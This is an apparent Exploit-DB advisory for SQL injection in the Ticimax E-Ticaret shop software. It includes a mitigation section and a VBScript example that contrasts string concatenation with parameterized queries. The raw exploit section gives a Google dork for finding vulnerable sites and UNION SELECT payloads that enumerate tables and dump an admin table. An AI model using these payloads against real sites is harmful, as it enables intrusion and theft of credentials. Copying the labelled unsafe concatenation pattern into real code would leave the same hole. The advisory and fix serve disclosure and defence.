Vendor: Ticimax E-Ticaret
Author: Neuromancer
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Ticimax E-Ticaret
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2010

Ticimax E-Ticaret (SQL Injection)

The Ticimax E-Ticaret application is vulnerable to SQL Injection in the Kategori.asp and urun_detay.asp pages. Both pages take an 'id' query-string parameter and pass it to the database without validation, so an attacker can inject SQL through that parameter.

Mitigation:

To mitigate this vulnerability, the vendor should validate the 'id' parameter against the type it is expected to hold (a numeric identifier) and use prepared statements or parameterized queries instead of concatenating the value into the SQL string.
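The following classic ASP (VBScript) fragment is an added example, not Ticimax's code, showing the concatenation pattern the advisory describes next to a parameterized replacement. It assumes a hypothetical table "kategori" with a column "kategori_adi" and an already-open ADODB.Connection named conn.

```vbscript
<%
' Added example (not Ticimax's code). Hypothetical handler for kategori.asp,
' assuming an open ADODB.Connection named conn and a table "kategori".
Option Explicit

' ADO constants (values from adovbs.inc, assumed not to be included already)
Const adInteger = 3
Const adParamInput = 1

' --- Vulnerable pattern: the untrusted 'id' value is spliced into the SQL text ---
' Whatever arrives in ?id= becomes part of the statement, which is the defect reported above.
Function BuildUnsafeQuery(id)
    BuildUnsafeQuery = "SELECT kategori_adi FROM kategori WHERE id=" & id
End Function

' --- Hardened pattern: validate the type first, then bind the value as a parameter ---
' Accepts only a plain non-negative integer of reasonable length.
Function IsValidId(value)
    Dim re
    Set re = New RegExp
    re.Pattern = "^\d{1,9}$"
    IsValidId = re.Test(value)
End Function

Function GetCategoryName(conn, id)
    Dim cmd, rs
    GetCategoryName = ""
    If Not IsValidId(id) Then Exit Function  ' reject before touching the database

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "SELECT kategori_adi FROM kategori WHERE id = ?"
    ' The value travels as a typed parameter; it is never part of the SQL string.
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(id))
    Set rs = cmd.Execute
    If Not rs.EOF Then GetCategoryName = rs("kategori_adi")
    rs.Close
End Function

' Page logic: the raw query-string value only ever goes through the safe path.
Dim requestedId
requestedId = Request.QueryString("id")
If IsValidId(requestedId) Then
    Response.Write Server.HTMLEncode(GetCategoryName(conn, requestedId))
Else
    Response.Status = "400 Bad Request"
End If
%>
```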

Exploit-DB raw data:

# Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]
# Date: [01.06.2010]
# Author: [Neuromancer]
# Version: [app version]
# CVE : [if exists]
# Code : [exploit code] 


#####################
# Author: [Neuromancer]
# contact : msn[at]neurom4ncer[dot]com
# From : TURKEY
#####################


Ticimax e-ticaret ( Kategori.asp, urun_detay.asp ) Local SQL Injection Vulnerability

Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"


======================================================================

                       --=[ Vuln C0de ]=-
 
                               [-] localhost/kategori.asp?id='
                               [-] localhost/urun_detay.asp?id='

http://[Site].com/kategori.asp?id=1 order by 1
http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables

or

http://[Site].com/kategori.asp?id=1 union select * from admin

=========================| -=[ Attackerz Crew co. ]=- |=========================

Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR